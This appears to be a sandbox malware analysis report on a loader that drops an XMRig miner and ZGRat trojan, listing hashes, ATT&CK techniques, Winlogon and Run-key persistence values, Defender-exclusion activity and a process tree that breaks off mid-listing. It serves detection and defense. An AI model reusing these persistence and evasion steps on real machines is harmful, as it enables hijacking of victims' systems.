xmrig | fbfa20ca6337fbe8f71ebab5e3328af667b9e9f4ad56ec7669e502f19e4f6905

Analysis

max time kernel
1798s
max time network
1798s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
14-05-2024 11:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

353KB
MD5

da4a981460566d93b7c25f1527c5d321
SHA1

ad0dc4e6192057d2f80b080741cdfea83c399a0b
SHA256

fbfa20ca6337fbe8f71ebab5e3328af667b9e9f4ad56ec7669e502f19e4f6905
SHA512

06d57ca29fb36c3c17f275485a69e58d3bb51a543f7dc96945122ad2108967a7995373ead8ce86eb9efc8131e1ae41dd2ac62cd02acb1933eac494e1ba1c6c93
SSDEEP

6144:ujwCtJxxb+fFgfWNIQudUChHCDomqrnBTcqRVhh69NhSzN+9Im:ujwC/xxpONIFFHCDVqpcqpc9zZO

Score

10^/10

xmrig zgrat evasion execution miner persistence rat spyware stealer upx

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Checker.exe	family_zgrat_v1
C:\blockcontainerWincrtdll\Sessionperf.exe	family_zgrat_v1
behavioral4/memory/3892-36-0x00000000001C0000-0x0000000000562000-memory.dmp	family_zgrat_v1

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Sessionperf.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\blockcontainerWincrtdll\\sppsvc.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Users\\Default User\\Idle.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\blockcontainerWincrtdll\\sppsvc.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Users\\Default User\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\SearchHost.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\blockcontainerWincrtdll\\sppsvc.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\blockcontainerWincrtdll\\sppsvc.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\blockcontainerWincrtdll\\sppsvc.exe\", \"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\", \"C:\\Recovery\\WindowsRE\\dwm.exe\""	Sessionperf.exe

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3652	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2848	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3764	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1812	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	416	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	904	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	3608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	3608	schtasks.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral4/memory/1548-255-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-258-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-262-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-260-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-261-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-259-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-256-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-298-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral4/memory/1548-299-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4228 powershell.exe
4068 powershell.exe
4084 powershell.exe
4048 powershell.exe
1368 powershell.exe
2040 powershell.exe
4380 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
4228	powershell.exe
4068	powershell.exe
4084	powershell.exe
4048	powershell.exe
1368	powershell.exe
2040	powershell.exe
4380	powershell.exe

Executes dropped EXE 20 IoCs

Processes:

Checker.exeUtility.exeSessionperf.exeSearchHost.exelhhsgwktkatl.exefontdrvhost.exesppsvc.exedwm.exeIdle.exefontdrvhost.exeSearchHost.exesppsvc.exedwm.exefontdrvhost.exesppsvc.exedwm.exeIdle.exefontdrvhost.exeSearchHost.exesppsvc.exe

pid	process
3552	Checker.exe
3452	Utility.exe
3892	Sessionperf.exe
2812	SearchHost.exe
1092	lhhsgwktkatl.exe
1720	fontdrvhost.exe
2804	sppsvc.exe
2348	dwm.exe
3152	Idle.exe
568	fontdrvhost.exe
4896	SearchHost.exe
1012	sppsvc.exe
3264	dwm.exe
3096	fontdrvhost.exe
2456	sppsvc.exe
4520	dwm.exe
948	Idle.exe
4760	fontdrvhost.exe
1064	SearchHost.exe
3852	sppsvc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/1548-252-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-251-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-250-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-255-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-258-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-262-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-260-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-261-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-259-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-254-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-256-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-253-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-298-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral4/memory/1548-299-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Sessionperf.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\blockcontainerWincrtdll\\sppsvc.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\blockcontainerWincrtdll\\sppsvc.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default User\\Idle.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\Recovery\\WindowsRE\\SearchHost.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Google\\Chrome\\Application\\fontdrvhost.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default User\\Idle.exe\""	Sessionperf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\SearchHost = "\"C:\\Recovery\\WindowsRE\\SearchHost.exe\""	Sessionperf.exe

Drops file in System32 directory 6 IoCs

Processes:

csc.exeUtility.exepowershell.exelhhsgwktkatl.exe

description	ioc	process
File created	\??\c:\Windows\System32\CSCD5CC967A790D48AD88533488B3BBE26.TMP	csc.exe
File created	\??\c:\Windows\System32\rcy5hw.exe	csc.exe
File opened for modification	C:\Windows\system32\MRT.exe	Utility.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	lhhsgwktkatl.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

lhhsgwktkatl.exe

description	pid	process	target process
PID 1092 set thread context of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 set thread context of 1548	1092	lhhsgwktkatl.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

Sessionperf.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\Application\fontdrvhost.exe	Sessionperf.exe
File created	C:\Program Files\Google\Chrome\Application\5b884080fd4f94	Sessionperf.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

1904 sc.exe
4620 sc.exe
4728 sc.exe
692 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1904	sc.exe
4620	sc.exe
4728	sc.exe
692	sc.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2848	schtasks.exe
1900	schtasks.exe
5056	schtasks.exe
1812	schtasks.exe
904	schtasks.exe
4808	schtasks.exe
2276	schtasks.exe
3652	schtasks.exe
4724	schtasks.exe
3764	schtasks.exe
1104	schtasks.exe
8	schtasks.exe
4720	schtasks.exe
4496	schtasks.exe
416	schtasks.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Modifies registry class 2 IoCs

Processes:

Checker.exeSessionperf.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	Checker.exe
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	Sessionperf.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

412 reg.exe

pid	process
412	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Sessionperf.exe

pid	process
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe
3892	Sessionperf.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

SearchHost.exe

pid process

2812 SearchHost.exe

pid	process
2812	SearchHost.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

Loader.exeSessionperf.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSearchHost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exefontdrvhost.exesppsvc.exedwm.exeIdle.exefontdrvhost.exeSearchHost.exesppsvc.exedwm.exefontdrvhost.exesppsvc.exedwm.exeIdle.exeSearchHost.exefontdrvhost.exesppsvc.exe

description	pid	process
Token: SeDebugPrivilege	5004	Loader.exe
Token: SeDebugPrivilege	3892	Sessionperf.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	2812	SearchHost.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeShutdownPrivilege	596	powercfg.exe
Token: SeCreatePagefilePrivilege	596	powercfg.exe
Token: SeShutdownPrivilege	1812	powercfg.exe
Token: SeCreatePagefilePrivilege	1812	powercfg.exe
Token: SeShutdownPrivilege	3564	powercfg.exe
Token: SeCreatePagefilePrivilege	3564	powercfg.exe
Token: SeShutdownPrivilege	4224	powercfg.exe
Token: SeCreatePagefilePrivilege	4224	powercfg.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeShutdownPrivilege	2756	powercfg.exe
Token: SeCreatePagefilePrivilege	2756	powercfg.exe
Token: SeLockMemoryPrivilege	1548	conhost.exe
Token: SeShutdownPrivilege	4412	powercfg.exe
Token: SeCreatePagefilePrivilege	4412	powercfg.exe
Token: SeShutdownPrivilege	396	powercfg.exe
Token: SeCreatePagefilePrivilege	396	powercfg.exe
Token: SeShutdownPrivilege	4992	powercfg.exe
Token: SeCreatePagefilePrivilege	4992	powercfg.exe
Token: SeDebugPrivilege	1720	fontdrvhost.exe
Token: SeDebugPrivilege	2804	sppsvc.exe
Token: SeDebugPrivilege	2348	dwm.exe
Token: SeDebugPrivilege	3152	Idle.exe
Token: SeDebugPrivilege	568	fontdrvhost.exe
Token: SeDebugPrivilege	4896	SearchHost.exe
Token: SeDebugPrivilege	1012	sppsvc.exe
Token: SeDebugPrivilege	3264	dwm.exe
Token: SeDebugPrivilege	3096	fontdrvhost.exe
Token: SeDebugPrivilege	2456	sppsvc.exe
Token: SeDebugPrivilege	4520	dwm.exe
Token: SeDebugPrivilege	948	Idle.exe
Token: SeDebugPrivilege	1064	SearchHost.exe
Token: SeDebugPrivilege	4760	fontdrvhost.exe
Token: SeDebugPrivilege	3852	sppsvc.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SearchHost.exe

pid process

2812 SearchHost.exe

pid	process
2812	SearchHost.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

Loader.exeChecker.exeWScript.execmd.exeSessionperf.execsc.execmd.execmd.exelhhsgwktkatl.execmd.exe

description	pid	process	target process
PID 5004 wrote to memory of 3552	5004	Loader.exe	Checker.exe
PID 5004 wrote to memory of 3552	5004	Loader.exe	Checker.exe
PID 5004 wrote to memory of 3552	5004	Loader.exe	Checker.exe
PID 3552 wrote to memory of 4076	3552	Checker.exe	WScript.exe
PID 3552 wrote to memory of 4076	3552	Checker.exe	WScript.exe
PID 3552 wrote to memory of 4076	3552	Checker.exe	WScript.exe
PID 5004 wrote to memory of 3452	5004	Loader.exe	Utility.exe
PID 5004 wrote to memory of 3452	5004	Loader.exe	Utility.exe
PID 4076 wrote to memory of 3140	4076	WScript.exe	cmd.exe
PID 4076 wrote to memory of 3140	4076	WScript.exe	cmd.exe
PID 4076 wrote to memory of 3140	4076	WScript.exe	cmd.exe
PID 3140 wrote to memory of 412	3140	cmd.exe	reg.exe
PID 3140 wrote to memory of 412	3140	cmd.exe	reg.exe
PID 3140 wrote to memory of 412	3140	cmd.exe	reg.exe
PID 3140 wrote to memory of 3892	3140	cmd.exe	Sessionperf.exe
PID 3140 wrote to memory of 3892	3140	cmd.exe	Sessionperf.exe
PID 3892 wrote to memory of 2512	3892	Sessionperf.exe	csc.exe
PID 3892 wrote to memory of 2512	3892	Sessionperf.exe	csc.exe
PID 2512 wrote to memory of 3684	2512	csc.exe	cvtres.exe
PID 2512 wrote to memory of 3684	2512	csc.exe	cvtres.exe
PID 3892 wrote to memory of 4380	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4380	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4228	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4228	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4068	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4068	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4084	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4084	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4048	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 4048	3892	Sessionperf.exe	powershell.exe
PID 3892 wrote to memory of 2196	3892	Sessionperf.exe	cmd.exe
PID 3892 wrote to memory of 2196	3892	Sessionperf.exe	cmd.exe
PID 2196 wrote to memory of 4088	2196	cmd.exe	chcp.com
PID 2196 wrote to memory of 4088	2196	cmd.exe	chcp.com
PID 2196 wrote to memory of 2208	2196	cmd.exe	w32tm.exe
PID 2196 wrote to memory of 2208	2196	cmd.exe	w32tm.exe
PID 2196 wrote to memory of 2812	2196	cmd.exe	SearchHost.exe
PID 2196 wrote to memory of 2812	2196	cmd.exe	SearchHost.exe
PID 8 wrote to memory of 4692	8	cmd.exe	wusa.exe
PID 8 wrote to memory of 4692	8	cmd.exe	wusa.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 3092	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 1548	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 1548	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 1548	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 1548	1092	lhhsgwktkatl.exe	conhost.exe
PID 1092 wrote to memory of 1548	1092	lhhsgwktkatl.exe	conhost.exe
PID 1716 wrote to memory of 4048	1716	cmd.exe	wusa.exe
PID 1716 wrote to memory of 4048	1716	cmd.exe	wusa.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Loader.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004

C:\Users\Admin\AppData\Local\Temp\Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Checker.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\blockcontainerWincrtdll\SFUqxLlNpV20NJ9uCnUYCbrkrl1WOe98n.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\blockcontainerWincrtdll\TudTneFnbF0PE5UTQ8BUoLqStO6.bat" "
4⤵
- Suspicious use of WriteProcessMemory
